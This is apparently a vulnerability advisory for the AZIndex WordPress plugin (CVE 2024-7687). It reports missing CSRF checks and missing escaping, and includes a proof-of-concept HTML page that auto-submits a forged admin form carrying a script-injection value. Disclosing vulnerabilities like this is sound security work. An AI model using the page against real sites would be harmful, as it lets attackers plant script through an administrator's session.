AZIndex <= 0.8.1 – Stored XSS via CSRF | CVE 2024-7687

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

Proof of Concept

Make a logged in admin open an HTML file containing:

```
<html>
<body onload="document.getElementById('autoSubmitForm').submit();">
    <form id="autoSubmitForm" action="https://example.com/wp-admin/tools.php?page=az-index-manager" method="post">
            <input type="hidden" name="_wp_http_referer" value="/wp-admin/tools.php?page=az-index-manager&action=az-new-index" />
            <input type="hidden" name="action" value="az-add-index" />
            <input type="hidden" name="_wpnonce" value="232xx" />
            
            <label for="name">Name:</label>
            <input type="text" id="name" name="name" value='csrf' /><br>
        
            <label for="cats">Cats:</label>
            <input type="text" id="cats" name="cats" value="" /><br>
        
            <label for="tags">Tags:</label>
            <input type="text" id="tags" name="tags" value="" /><br>

            <label for="head">Head:</label>
            <input type="text" id="head" name="head" value="title" /><br>
        
            <label for="head-key">Head Key:</label>
            <input type="text" id="head-key" name="head-key" value="" /><br>
        
            <label for="subhead">Subhead:</label>
            <input type="text" id="subhead" name="subhead" value="none" /><br>
   
            <input type="text" id="headsep" name="headsep" value='"><script>alert(1)</script>' /><br>      
            <input type="submit" name="submit" value="Add Index" />
    </form>
</body>
</html>
```